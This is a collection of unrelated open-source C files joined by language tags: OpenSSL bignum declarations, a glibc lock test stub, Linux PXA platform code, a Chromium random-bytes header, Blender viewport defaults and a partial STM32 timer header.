BN_asc2bn(BIGNUM **a, const char *str); int BN_gcd(BIGNUM *r,const BIGNUM *a,const BIGNUM *b,BN_CTX *ctx); int BN_kronecker(const BIGNUM *a,const BIGNUM *b,BN_CTX *ctx); /* returns -2 for error */ 
BIGNUM *BN_mod_inverse(BIGNUM *ret, const BIGNUM *a, const BIGNUM *n,BN_CTX *ctx); BIGNUM *BN_mod_sqrt(BIGNUM *ret, const BIGNUM *a, const BIGNUM *n,BN_CTX *ctx); /* Deprecated versions */ #ifndef OPENSSL_NO_DEPRECATED BIGNUM *BN_generate_prime(BIGNUM *ret,int bits,int safe, const BIGNUM *add, const BIGNUM *rem, void (*callback)(int,int,void *),void *cb_arg); int BN_is_prime(const BIGNUM *p,int nchecks, void (*callback)(int,int,void *), BN_CTX *ctx,void *cb_arg); int BN_is_prime_fasttest(const BIGNUM *p,int nchecks, void (*callback)(int,int,void *),BN_CTX *ctx,void *cb_arg, int do_trial_division); #endif /* !defined(OPENSSL_NO_DEPRECATED) */ /* Newer versions */ int BN_generate_prime_ex(BIGNUM *ret,int bits,int safe, const BIGNUM *add, const BIGNUM *rem, BN_GENCB *cb); int BN_is_prime_ex(const BIGNUM *p,int nchecks, BN_CTX *ctx, BN_GENCB *cb); int BN_is_prime_fasttest_ex(const BIGNUM *p,int nchecks, BN_CTX *ctx, int do_trial_division, BN_GENCB *cb); int BN_X931_generate_Xpq(BIGNUM *Xp, BIGNUM *Xq, int nbits, BN_CTX *ctx); int BN_X931_derive_prime_ex(BIGNUM *p, BIGNUM *p1, BIGNUM *p2, const BIGNUM *Xp, const BIGNUM *Xp1, const BIGNUM *Xp2, const BIGNUM *e, BN_CTX *ctx, BN_GENCB *cb); int BN_X931_generate_prime_ex(BIGNUM *p, BIGNUM *p1, BIGNUM *p2, BIGNUM *Xp1, BIGNUM *Xp2, const BIGNUM *Xp, const BIGNUM *e, BN_CTX *ctx, BN_GENCB *cb); BN_MONT_CTX *BN_MONT_CTX_new(void ); void BN_MONT_CTX_init(BN_MONT_CTX *ctx); int BN_mod_mul_montgomery(BIGNUM *r,const BIGNUM *a,const BIGNUM *b, BN_MONT_CTX *mont, BN_CTX *ctx); #define BN_to_montgomery(r,a,mont,ctx) BN_mod_mul_montgomery(\ (r),(a),&((mont)->RR),(mont),(ctx)) int BN_from_montgomery(BIGNUM *r,const BIGNUM *a, BN_MONT_CTX *mont, BN_CTX *ctx); void BN_MONT_CTX_free(BN_MONT_CTX *mont); int BN_MONT_CTX_set(BN_MONT_CTX *mont,const BIGNUM *mod,BN_CTX *ctx); BN_MONT_CTX *BN_MONT_CTX_copy(BN_MONT_CTX *to,BN_MONT_CTX *from); BN_MONT_CTX *BN_MONT_CTX_set_locked(BN_MONT_CTX **pmont, int lock, const BIGNUM *mod, BN_CTX *ctx); /* 
BN_BLINDING flags */ #define BN_BLINDING_NO_UPDATE 0x00000001 #define BN_BLINDING_NO_RECREATE 0x00000002 BN_BLINDING *BN_BLINDING_new(const BIGNUM *A, const BIGNUM *Ai, BIGNUM *mod); void BN_BLINDING_free(BN_BLINDING *b); int BN_BLINDING_update(BN_BLINDING *b,BN_CTX *ctx); int BN_BLINDING_convert(BIGNUM *n, BN_BLINDING *b, BN_CTX *ctx); int BN_BLINDING_invert(BIGNUM *n, BN_BLINDING *b, BN_CTX *ctx); int BN_BLINDING_convert_ex(BIGNUM *n, BIGNUM *r, BN_BLINDING *b, BN_CTX *); int BN_BLINDING_invert_ex(BIGNUM *n, const BIGNUM *r, BN_BLINDING *b, BN_CTX *); #ifndef OPENSSL_NO_DEPRECATED unsigned long BN_BLINDING_get_thread_id(const BN_BLINDING *); void BN_BLINDING_set_thread_id(BN_BLINDING *, unsigned long); #endif CRYPTO_THREADID *BN_BLINDING_thread_id(BN_BLINDING *); unsigned long BN_BLINDING_get_flags(const BN_BLINDING *); void BN_BLINDING_set_flags(BN_BLINDING *, unsigned long); BN_BLINDING *BN_BLINDING_create_param(BN_BLINDING *b, const BIGNUM *e, BIGNUM *m, BN_CTX *ctx, int (*bn_mod_exp)(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *m_ctx), BN_MONT_CTX *m_ctx); #ifndef OPENSSL_NO_DEPRECATED void BN_set_params(int mul,int high,int low,int mont); int BN_get_params(int which); /* 0, mul, 1 high, 2 low, 3 mont */ #endif void BN_RECP_CTX_init(BN_RECP_CTX *recp); BN_RECP_CTX *BN_RECP_CTX_new(void); void BN_RECP_CTX_free(BN_RECP_CTX *recp); int BN_RECP_CTX_set(BN_RECP_CTX *recp,const BIGNUM *rdiv,BN_CTX *ctx); int BN_mod_mul_reciprocal(BIGNUM *r, const BIGNUM *x, const BIGNUM *y, BN_RECP_CTX *recp,BN_CTX *ctx); int BN_mod_exp_recp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, const BIGNUM *m, BN_CTX *ctx); int BN_div_recp(BIGNUM *dv, BIGNUM *rem, const BIGNUM *m, BN_RECP_CTX *recp, BN_CTX *ctx); #ifndef OPENSSL_NO_EC2M /* Functions for arithmetic over binary polynomials represented by BIGNUMs. * * The BIGNUM::neg property of BIGNUMs representing binary polynomials is * ignored. 
* * Note that input arguments are not const so that their bit arrays can * be expanded to the appropriate size if needed. */ int BN_GF2m_add(BIGNUM *r, const BIGNUM *a, const BIGNUM *b); /*r = a + b*/ #define BN_GF2m_sub(r, a, b) BN_GF2m_add(r, a, b) int BN_GF2m_mod(BIGNUM *r, const BIGNUM *a, const BIGNUM *p); /*r=a mod p*/ int BN_GF2m_mod_mul(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, const BIGNUM *p, BN_CTX *ctx); /* r = (a * b) mod p */ int BN_GF2m_mod_sqr(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx); /* r = (a * a) mod p */ int BN_GF2m_mod_inv(BIGNUM *r, const BIGNUM *b, const BIGNUM *p, BN_CTX *ctx); /* r = (1 / b) mod p */ int BN_GF2m_mod_div(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, const BIGNUM *p, BN_CTX *ctx); /* r = (a / b) mod p */ int BN_GF2m_mod_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, const BIGNUM *p, BN_CTX *ctx); /* r = (a ^ b) mod p */ int BN_GF2m_mod_sqrt(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx); /* r = sqrt(a) mod p */ int BN_GF2m_mod_solve_quad(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx); /* r^2 + r = a mod p */ #define BN_GF2m_cmp(a, b) BN_ucmp((a), (b)) /* Some functions allow for representation of the irreducible polynomials * as an unsigned int[], say p. The irreducible f(t) is then of the form: * t^p[0] + t^p[1] + ... + t^p[k] * where m = p[0] > p[1] > ... > p[k] = 0. 
*/ int BN_GF2m_mod_arr(BIGNUM *r, const BIGNUM *a, const int p[]); /* r = a mod p */ int BN_GF2m_mod_mul_arr(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, const int p[], BN_CTX *ctx); /* r = (a * b) mod p */ int BN_GF2m_mod_sqr_arr(BIGNUM *r, const BIGNUM *a, const int p[], BN_CTX *ctx); /* r = (a * a) mod p */ int BN_GF2m_mod_inv_arr(BIGNUM *r, const BIGNUM *b, const int p[], BN_CTX *ctx); /* r = (1 / b) mod p */ int BN_GF2m_mod_div_arr(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, const int p[], BN_CTX *ctx); /* r = (a / b) mod p */ int BN_GF2m_mod_exp_arr(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, const int p[], BN_CTX *ctx); /* r = (a ^ b) mod p */ int BN_GF2m_mod_sqrt_arr(BIGNUM *r, const BIGNUM *a, const int p[], BN_CTX *ctx); /* r = sqrt(a) mod p */ int BN_GF2m_mod_solve_quad_arr(BIGNUM *r, const BIGNUM *a, const int p[], BN_CTX *ctx); /* r^2 + r = a mod p */ int BN_GF2m_poly2arr(const BIGNUM *a, int p[], int max); int BN_GF2m_arr2poly(const int p[], BIGNUM *a); #endif /* faster mod functions for the 'NIST primes' * 0 <= a < p^2 */ int BN_nist_mod_192(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx); int BN_nist_mod_224(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx); int BN_nist_mod_256(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx); int BN_nist_mod_384(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx); int BN_nist_mod_521(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx); const BIGNUM *BN_get0_nist_prime_192(void); const BIGNUM *BN_get0_nist_prime_224(void); const BIGNUM *BN_get0_nist_prime_256(void); const BIGNUM *BN_get0_nist_prime_384(void); const BIGNUM *BN_get0_nist_prime_521(void); /* library internal functions */ #define bn_expand(a,bits) ((((((bits+BN_BITS2-1))/BN_BITS2)) <= (a)->dmax)?\ (a):bn_expand2((a),(bits+BN_BITS2-1)/BN_BITS2)) #define bn_wexpand(a,words) (((words) <= (a)->dmax)?(a):bn_expand2((a),(words))) BIGNUM *bn_expand2(BIGNUM *a, int words); #ifndef OPENSSL_NO_DEPRECATED BIGNUM 
*bn_dup_expand(const BIGNUM *a, int words); /* unused */ #endif /* Bignum consistency macros * There is one "API" macro, bn_fix_top(), for stripping leading zeroes from * bignum data after direct manipulations on the data. There is also an * "internal" macro, bn_check_top(), for verifying that there are no leading * zeroes. Unfortunately, some auditing is required due to the fact that * bn_fix_top() has become an overabused duct-tape because bignum data is * occasionally passed around in an inconsistent state. So the following * changes have been made to sort this out; * - bn_fix_top()s implementation has been moved to bn_correct_top() * - if BN_DEBUG isn't defined, bn_fix_top() maps to bn_correct_top(), and * bn_check_top() is as before. * - if BN_DEBUG *is* defined; * - bn_check_top() tries to pollute unused words even if the bignum 'top' is * consistent. (ed: only if BN_DEBUG_RAND is defined) * - bn_fix_top() maps to bn_check_top() rather than "fixing" anything. * The idea is to have debug builds flag up inconsistent bignums when they * occur. If that occurs in a bn_fix_top(), we examine the code in question; if * the use of bn_fix_top() was appropriate (ie. it follows directly after code * that manipulates the bignum) it is converted to bn_correct_top(), and if it * was not appropriate, we convert it permanently to bn_check_top() and track * down the cause of the bug. Eventually, no internal code should be using the * bn_fix_top() macro. External applications and libraries should try this with * their own code too, both in terms of building against the openssl headers * with BN_DEBUG defined *and* linking with a version of OpenSSL built with it * defined. This not only improves external code, it provides more test * coverage for openssl's own code. 
*/ #ifdef BN_DEBUG /* We only need assert() when debugging */ #include <assert.h> #ifdef BN_DEBUG_RAND /* To avoid "make update" cvs wars due to BN_DEBUG, use some tricks */ #ifndef RAND_pseudo_bytes int RAND_pseudo_bytes(unsigned char *buf,int num); #define BN_DEBUG_TRIX #endif #define bn_pollute(a) \ do { \ const BIGNUM *_bnum1 = (a); \ if(_bnum1->top < _bnum1->dmax) { \ unsigned char _tmp_char; \ /* We cast away const without the compiler knowing, any \ * *genuinely* constant variables that aren't mutable \ * wouldn't be constructed with top!=dmax. */ \ BN_ULONG *_not_const; \ memcpy(&_not_const, &_bnum1->d, sizeof(BN_ULONG*)); \ RAND_pseudo_bytes(&_tmp_char, 1); \ memset((unsigned char *)(_not_const + _bnum1->top), _tmp_char, \ (_bnum1->dmax - _bnum1->top) * sizeof(BN_ULONG)); \ } \ } while(0) #ifdef BN_DEBUG_TRIX #undef RAND_pseudo_bytes #endif #else #define bn_pollute(a) #endif #define bn_check_top(a) \ do { \ const BIGNUM *_bnum2 = (a); \ if (_bnum2 != NULL) { \ assert((_bnum2->top == 0) || \ (_bnum2->d[_bnum2->top - 1] != 0)); \ bn_pollute(_bnum2); \ } \ } while(0) #define bn_fix_top(a) bn_check_top(a) #else /* !BN_DEBUG */ #define bn_pollute(a) #define bn_check_top(a) #define bn_fix_top(a) bn_correct_top(a) #endif #define bn_correct_top(a) \ { \ BN_ULONG *ftl; \ int tmp_top = (a)->top; \ if (tmp_top > 0) \ { \ for (ftl= &((a)->d[tmp_top-1]); tmp_top > 0; tmp_top--) \ if (*(ftl--)) break; \ (a)->top = tmp_top; \ } \ bn_pollute(a); \ } BN_ULONG bn_mul_add_words(BN_ULONG *rp, const BN_ULONG *ap, int num, BN_ULONG w); BN_ULONG bn_mul_words(BN_ULONG *rp, const BN_ULONG *ap, int num, BN_ULONG w); void bn_sqr_words(BN_ULONG *rp, const BN_ULONG *ap, int num); BN_ULONG bn_div_words(BN_ULONG h, BN_ULONG l, BN_ULONG d); BN_ULONG bn_add_words(BN_ULONG *rp, const BN_ULONG *ap, const BN_ULONG *bp,int num); BN_ULONG bn_sub_words(BN_ULONG *rp, const BN_ULONG *ap, const BN_ULONG *bp,int num); /* Primes from RFC 2409 */ BIGNUM *get_rfc2409_prime_768(BIGNUM *bn); BIGNUM 
*get_rfc2409_prime_1024(BIGNUM *bn); /* Primes from RFC 3526 */ BIGNUM *get_rfc3526_prime_1536(BIGNUM *bn); BIGNUM *get_rfc3526_prime_2048(BIGNUM *bn); BIGNUM *get_rfc3526_prime_3072(BIGNUM *bn); BIGNUM *get_rfc3526_prime_4096(BIGNUM *bn); BIGNUM *get_rfc3526_prime_6144(BIGNUM *bn); BIGNUM *get_rfc3526_prime_8192(BIGNUM *bn); int BN_bntest_rand(BIGNUM *rnd, int bits, int top,int bottom); /* BEGIN ERROR CODES */ /* The following lines are auto generated by the script mkerr.pl. Any changes * made after this point may be overwritten when the script is next run. */ void ERR_load_BN_strings(void); /* Error codes for the BN functions. */ /* Function codes. */ #define BN_F_BNRAND 127 #define BN_F_BN_BLINDING_CONVERT_EX 100 #define BN_F_BN_BLINDING_CREATE_PARAM 128 #define BN_F_BN_BLINDING_INVERT_EX 101 #define BN_F_BN_BLINDING_NEW 102 #define BN_F_BN_BLINDING_UPDATE 103 #define BN_F_BN_BN2DEC 104 #define BN_F_BN_BN2HEX 105 #define BN_F_BN_CTX_GET 116 #define BN_F_BN_CTX_NEW 106 #define BN_F_BN_CTX_START 129 #define BN_F_BN_DIV 107 #define BN_F_BN_DIV_NO_BRANCH 138 #define BN_F_BN_DIV_RECP 130 #define BN_F_BN_EXP 123 #define BN_F_BN_EXPAND2 108 #define BN_F_BN_EXPAND_INTERNAL 120 #define BN_F_BN_GF2M_MOD 131 #define BN_F_BN_GF2M_MOD_EXP 132 #define BN_F_BN_GF2M_MOD_MUL 133 #define BN_F_BN_GF2M_MOD_SOLVE_QUAD 134 #define BN_F_BN_GF2M_MOD_SOLVE_QUAD_ARR 135 #define BN_F_BN_GF2M_MOD_SQR 136 #define BN_F_BN_GF2M_MOD_SQRT 137 #define BN_F_BN_MOD_EXP2_MONT 118 #define BN_F_BN_MOD_EXP_MONT 109 #define BN_F_BN_MOD_EXP_MONT_CONSTTIME 124 #define BN_F_BN_MOD_EXP_MONT_WORD 117 #define BN_F_BN_MOD_EXP_RECP 125 #define BN_F_BN_MOD_EXP_SIMPLE 126 #define BN_F_BN_MOD_INVERSE 110 #define BN_F_BN_MOD_INVERSE_NO_BRANCH 139 #define BN_F_BN_MOD_LSHIFT_QUICK 119 #define BN_F_BN_MOD_MUL_RECIPROCAL 111 #define BN_F_BN_MOD_SQRT 121 #define BN_F_BN_MPI2BN 112 #define BN_F_BN_NEW 113 #define BN_F_BN_RAND 114 #define BN_F_BN_RAND_RANGE 122 #define BN_F_BN_USUB 115 /* Reason codes. 
*/ #define BN_R_ARG2_LT_ARG3 100 #define BN_R_BAD_RECIPROCAL 101 #define BN_R_BIGNUM_TOO_LONG 114 #define BN_R_CALLED_WITH_EVEN_MODULUS 102 #define BN_R_DIV_BY_ZERO 103 #define BN_R_ENCODING_ERROR 104 #define BN_R_EXPAND_ON_STATIC_BIGNUM_DATA 105 #define BN_R_INPUT_NOT_REDUCED 110 #define BN_R_INVALID_LENGTH 106 #define BN_R_INVALID_RANGE 115 #define BN_R_NOT_A_SQUARE 111 #define BN_R_NOT_INITIALIZED 107 #define BN_R_NO_INVERSE 108 #define BN_R_NO_SOLUTION 116 #define BN_R_P_IS_NOT_PRIME 112 #define BN_R_TOO_MANY_ITERATIONS 113 #define BN_R_TOO_MANY_TEMPORARY_VARIABLES 109 #ifdef __cplusplus } #endif #endif
{ "language": "C" }
/* Test program for timedout read/write lock functions. Copyright (C) 2003 Free Software Foundation, Inc. Contributed by Ulrich Drepper <drepper@redhat.com>, 2003. The GNU C Library is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2.1 of the License, or (at your option) any later version. The GNU C Library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. You should have received a copy of the GNU Lesser General Public License along with the GNU C Library; see the file COPYING.LIB. If not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #define INIT PTHREAD_RWLOCK_INITIALIZER #include "tst-rwlock8.c"
{ "language": "C" }
#if !defined(AFX_SIERRAUP_H__4A2F7A4E_B19E_4254_8DC2_5D0E814DAD1B__INCLUDED_) #define AFX_SIERRAUP_H__4A2F7A4E_B19E_4254_8DC2_5D0E814DAD1B__INCLUDED_ #if _MSC_VER > 1000 #pragma once #endif // _MSC_VER > 1000 #include "resource.h" #endif // !defined(AFX_SIERRAUP_H__4A2F7A4E_B19E_4254_8DC2_5D0E814DAD1B__INCLUDED_)
{ "language": "C" }
/* * linux/arch/arm/mach-pxa/generic.c * * Author: Nicolas Pitre * Created: Jun 15, 2001 * Copyright: MontaVista Software Inc. * * Code common to all PXA machines. * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License version 2 as * published by the Free Software Foundation. * * Since this file should be linked before any other machine specific file, * the __initcall() here will be executed first. This serves as default * initialization stuff for PXA machines which can be overridden later if * need be. */ #include <linux/module.h> #include <linux/kernel.h> #include <linux/init.h> #include <mach/hardware.h> #include <asm/system.h> #include <asm/pgtable.h> #include <asm/mach/map.h> #include <asm/mach-types.h> #include <mach/reset.h> #include <mach/gpio.h> #include "generic.h" void clear_reset_status(unsigned int mask) { if (cpu_is_pxa2xx()) pxa2xx_clear_reset_status(mask); if (cpu_is_pxa3xx()) pxa3xx_clear_reset_status(mask); } unsigned long get_clock_tick_rate(void) { unsigned long clock_tick_rate; if (cpu_is_pxa25x()) clock_tick_rate = 3686400; else if (machine_is_mainstone()) clock_tick_rate = 3249600; else clock_tick_rate = 3250000; return clock_tick_rate; } EXPORT_SYMBOL(get_clock_tick_rate); /* * Get the clock frequency as reflected by CCCR and the turbo flag. * We assume these values have been applied via a fcs. * If info is not 0 we also display the current settings. 
*/ unsigned int get_clk_frequency_khz(int info) { if (cpu_is_pxa25x()) return pxa25x_get_clk_frequency_khz(info); else if (cpu_is_pxa27x()) return pxa27x_get_clk_frequency_khz(info); else return pxa3xx_get_clk_frequency_khz(info); } EXPORT_SYMBOL(get_clk_frequency_khz); /* * Return the current memory clock frequency in units of 10kHz */ unsigned int get_memclk_frequency_10khz(void) { if (cpu_is_pxa25x()) return pxa25x_get_memclk_frequency_10khz(); else if (cpu_is_pxa27x()) return pxa27x_get_memclk_frequency_10khz(); else return pxa3xx_get_memclk_frequency_10khz(); } EXPORT_SYMBOL(get_memclk_frequency_10khz); /* * Intel PXA2xx internal register mapping. * * Note 1: not all PXA2xx variants implement all those addresses. * * Note 2: virtual 0xfffe0000-0xffffffff is reserved for the vector table * and cache flush area. */ static struct map_desc standard_io_desc[] __initdata = { { /* Devs */ .virtual = 0xf2000000, .pfn = __phys_to_pfn(0x40000000), .length = 0x02000000, .type = MT_DEVICE }, { /* Mem Ctl */ .virtual = 0xf6000000, .pfn = __phys_to_pfn(0x48000000), .length = 0x00200000, .type = MT_DEVICE }, { /* Camera */ .virtual = 0xfa000000, .pfn = __phys_to_pfn(0x50000000), .length = 0x00100000, .type = MT_DEVICE }, { /* IMem ctl */ .virtual = 0xfe000000, .pfn = __phys_to_pfn(0x58000000), .length = 0x00100000, .type = MT_DEVICE }, { /* UNCACHED_PHYS_0 */ .virtual = 0xff000000, .pfn = __phys_to_pfn(0x00000000), .length = 0x00100000, .type = MT_DEVICE } }; void __init pxa_map_io(void) { iotable_init(standard_io_desc, ARRAY_SIZE(standard_io_desc)); get_clk_frequency_khz(1); }
{ "language": "C" }
// Copyright (c) 2012 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef CRYPTO_RANDOM_H_ #define CRYPTO_RANDOM_H_ #include <stddef.h> #include "base/containers/span.h" #include "crypto/crypto_export.h" namespace crypto { // Fills the given buffer with |length| random bytes of cryptographically // secure random numbers. // |length| must be positive. CRYPTO_EXPORT void RandBytes(void *bytes, size_t length); // Fills |bytes| with cryptographically-secure random bits. CRYPTO_EXPORT void RandBytes(base::span<uint8_t> bytes); } #endif // CRYPTO_RANDOM_H_
{ "language": "C" }
/*
 * This program is free software; you can redistribute it and/or
 * modify it under the terms of the GNU General Public License
 * as published by the Free Software Foundation; either version 2
 * of the License, or (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software Foundation,
 * Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
 */

/** \file
 * \ingroup DNA
 *
 * Default values for the 3D viewport DNA structs, expanded as
 * designated-initializer macros by the DNA defaults system.
 */

#ifndef __DNA_VIEW3D_DEFAULTS_H__
#define __DNA_VIEW3D_DEFAULTS_H__

/* Struct members on own line. */
/* clang-format off */

/* -------------------------------------------------------------------- */
/** \name Viewport Struct
 * \{ */

/* Defaults for View3DShading: solid-mode studio shading. */
#define _DNA_DEFAULT_View3DShading \
  { \
    .type = OB_SOLID, \
    .prev_type = OB_SOLID, \
    .flag = V3D_SHADING_SPECULAR_HIGHLIGHT | V3D_SHADING_XRAY_WIREFRAME | \
            V3D_SHADING_SCENE_LIGHTS_RENDER | V3D_SHADING_SCENE_WORLD_RENDER, \
    .light = V3D_LIGHTING_STUDIO, \
    .shadow_intensity = 0.5f, \
    .xray_alpha = 0.5f, \
    .xray_alpha_wire = 0.5f, \
    .cavity_valley_factor = 1.0f, \
    .cavity_ridge_factor = 1.0f, \
    .cavity_type = V3D_SHADING_CAVITY_CURVATURE, \
    .curvature_ridge_factor = 1.0f, \
    .curvature_valley_factor = 1.0f, \
    .single_color = {0.8f, 0.8f, 0.8f}, \
    .background_color = {0.05f, 0.05f, 0.05f}, \
    .studiolight_intensity = 1.0f, \
  }

/* Defaults for View3DOverlay: edit-mode and paint-mode overlay opacities. */
#define _DNA_DEFAULT_View3DOverlay \
  { \
    .wireframe_threshold = 1.0f, \
    .xray_alpha_bone = 0.5f, \
    .texture_paint_mode_opacity = 1.0f, \
    .weight_paint_mode_opacity = 1.0f, \
    .vertex_paint_mode_opacity = 1.0f, \
    /* Intentionally different to vertex/paint mode, \
     * we typically want to see shading too. */ \
    .sculpt_mode_mask_opacity = 0.75f, \
 \
    .edit_flag = V3D_OVERLAY_EDIT_FACES | V3D_OVERLAY_EDIT_SEAMS | \
                 V3D_OVERLAY_EDIT_SHARP | V3D_OVERLAY_EDIT_FREESTYLE_EDGE | \
                 V3D_OVERLAY_EDIT_FREESTYLE_FACE | V3D_OVERLAY_EDIT_EDGES | \
                 V3D_OVERLAY_EDIT_CREASES | V3D_OVERLAY_EDIT_BWEIGHTS | \
                 V3D_OVERLAY_EDIT_CU_HANDLES | V3D_OVERLAY_EDIT_CU_NORMALS, \
 \
    .gpencil_paper_opacity = 0.5f, \
    .gpencil_grid_opacity = 0.9f, \
  }

/* Defaults for the 3D cursor: identity rotation, XYZ Euler mode. */
#define _DNA_DEFAULT_View3DCursor \
  { \
    .rotation_mode = ROT_MODE_XYZ, \
    .rotation_quaternion = {1, 0, 0, 0}, \
    .rotation_axis = {0, 1, 0}, \
  }

/* Defaults for the View3D space itself; embeds the shading and
 * overlay defaults defined above. */
#define _DNA_DEFAULT_View3D \
  { \
    .spacetype = SPACE_VIEW3D, \
    .scenelock = true, \
    .grid = 1.0f, \
    .gridlines = 16, \
    .gridsubdiv = 10, \
    .shading = _DNA_DEFAULT_View3DShading, \
    .overlay = _DNA_DEFAULT_View3DOverlay, \
 \
    .gridflag = V3D_SHOW_X | V3D_SHOW_Y | V3D_SHOW_FLOOR | V3D_SHOW_ORTHO_GRID, \
 \
    .flag = V3D_SELECT_OUTLINE, \
    .flag2 = V3D_SHOW_RECONSTRUCTION | V3D_SHOW_ANNOTATION, \
 \
    .lens = 50.0f, \
    .clip_start = 0.01f, \
    .clip_end = 1000.0f, \
 \
    .bundle_size = 0.2f, \
    .bundle_drawtype = OB_PLAINAXES, \
 \
    /* stereo */ \
    .stereo3d_camera = STEREO_3D_ID, \
    .stereo3d_flag = V3D_S3D_DISPPLANE, \
    .stereo3d_convergence_alpha = 0.15f, \
    .stereo3d_volume_alpha = 0.05f, \
 \
    /* Grease pencil settings. */ \
    .vertex_opacity = 1.0f, \
    .gp_flag = V3D_GP_SHOW_EDIT_LINES, \
  }

/** \} */

/* clang-format on */

#endif /* __DNA_VIEW3D_DEFAULTS_H__ */
{ "language": "C" }
/** ****************************************************************************** * @file stm32f10x_tim.h * @author MCD Application Team * @version V3.5.0 * @date 11-March-2011 * @brief This file contains all the functions prototypes for the TIM firmware * library. ****************************************************************************** * @attention * * THE PRESENT FIRMWARE WHICH IS FOR GUIDANCE ONLY AIMS AT PROVIDING CUSTOMERS * WITH CODING INFORMATION REGARDING THEIR PRODUCTS IN ORDER FOR THEM TO SAVE * TIME. AS A RESULT, STMICROELECTRONICS SHALL NOT BE HELD LIABLE FOR ANY * DIRECT, INDIRECT OR CONSEQUENTIAL DAMAGES WITH RESPECT TO ANY CLAIMS ARISING * FROM THE CONTENT OF SUCH FIRMWARE AND/OR THE USE MADE BY CUSTOMERS OF THE * CODING INFORMATION CONTAINED HEREIN IN CONNECTION WITH THEIR PRODUCTS. * * <h2><center>&copy; COPYRIGHT 2011 STMicroelectronics</center></h2> ****************************************************************************** */ /* Define to prevent recursive inclusion -------------------------------------*/ #ifndef __STM32F10x_TIM_H #define __STM32F10x_TIM_H #ifdef __cplusplus extern "C" { #endif /* Includes ------------------------------------------------------------------*/ #include "stm32f10x.h" /** @addtogroup STM32F10x_StdPeriph_Driver * @{ */ /** @addtogroup TIM * @{ */ /** @defgroup TIM_Exported_Types * @{ */ /** * @brief TIM Time Base Init structure definition * @note This structure is used with all TIMx except for TIM6 and TIM7. */ typedef struct { uint16_t TIM_Prescaler; /*!< Specifies the prescaler value used to divide the TIM clock. This parameter can be a number between 0x0000 and 0xFFFF */ uint16_t TIM_CounterMode; /*!< Specifies the counter mode. This parameter can be a value of @ref TIM_Counter_Mode */ uint16_t TIM_Period; /*!< Specifies the period value to be loaded into the active Auto-Reload Register at the next update event. This parameter must be a number between 0x0000 and 0xFFFF. 
*/ uint16_t TIM_ClockDivision; /*!< Specifies the clock division. This parameter can be a value of @ref TIM_Clock_Division_CKD */ uint8_t TIM_RepetitionCounter; /*!< Specifies the repetition counter value. Each time the RCR downcounter reaches zero, an update event is generated and counting restarts from the RCR value (N). This means in PWM mode that (N+1) corresponds to: - the number of PWM periods in edge-aligned mode - the number of half PWM period in center-aligned mode This parameter must be a number between 0x00 and 0xFF. @note This parameter is valid only for TIM1 and TIM8. */ } TIM_TimeBaseInitTypeDef; /** * @brief TIM Output Compare Init structure definition */ typedef struct { uint16_t TIM_OCMode; /*!< Specifies the TIM mode. This parameter can be a value of @ref TIM_Output_Compare_and_PWM_modes */ uint16_t TIM_OutputState; /*!< Specifies the TIM Output Compare state. This parameter can be a value of @ref TIM_Output_Compare_state */ uint16_t TIM_OutputNState; /*!< Specifies the TIM complementary Output Compare state. This parameter can be a value of @ref TIM_Output_Compare_N_state @note This parameter is valid only for TIM1 and TIM8. */ uint16_t TIM_Pulse; /*!< Specifies the pulse value to be loaded into the Capture Compare Register. This parameter can be a number between 0x0000 and 0xFFFF */ uint16_t TIM_OCPolarity; /*!< Specifies the output polarity. This parameter can be a value of @ref TIM_Output_Compare_Polarity */ uint16_t TIM_OCNPolarity; /*!< Specifies the complementary output polarity. This parameter can be a value of @ref TIM_Output_Compare_N_Polarity @note This parameter is valid only for TIM1 and TIM8. */ uint16_t TIM_OCIdleState; /*!< Specifies the TIM Output Compare pin state during Idle state. This parameter can be a value of @ref TIM_Output_Compare_Idle_State @note This parameter is valid only for TIM1 and TIM8. */ uint16_t TIM_OCNIdleState; /*!< Specifies the TIM Output Compare pin state during Idle state. 
This parameter can be a value of @ref TIM_Output_Compare_N_Idle_State @note This parameter is valid only for TIM1 and TIM8. */ } TIM_OCInitTypeDef; /** * @brief TIM Input Capture Init structure definition */ typedef struct { uint16_t TIM_Channel; /*!< Specifies the TIM channel. This parameter can be a value of @ref TIM_Channel */ uint16_t TIM_ICPolarity; /*!< Specifies the active edge of the input signal. This parameter can be a value of @ref TIM_Input_Capture_Polarity */ uint16_t TIM_ICSelection; /*!< Specifies the input. This parameter can be a value of @ref TIM_Input_Capture_Selection */ uint16_t TIM_ICPrescaler; /*!< Specifies the Input Capture Prescaler. This parameter can be a value of @ref TIM_Input_Capture_Prescaler */ uint16_t TIM_ICFilter; /*!< Specifies the input capture filter. This parameter can be a number between 0x0 and 0xF */ } TIM_ICInitTypeDef; /** * @brief BDTR structure definition * @note This structure is used only with 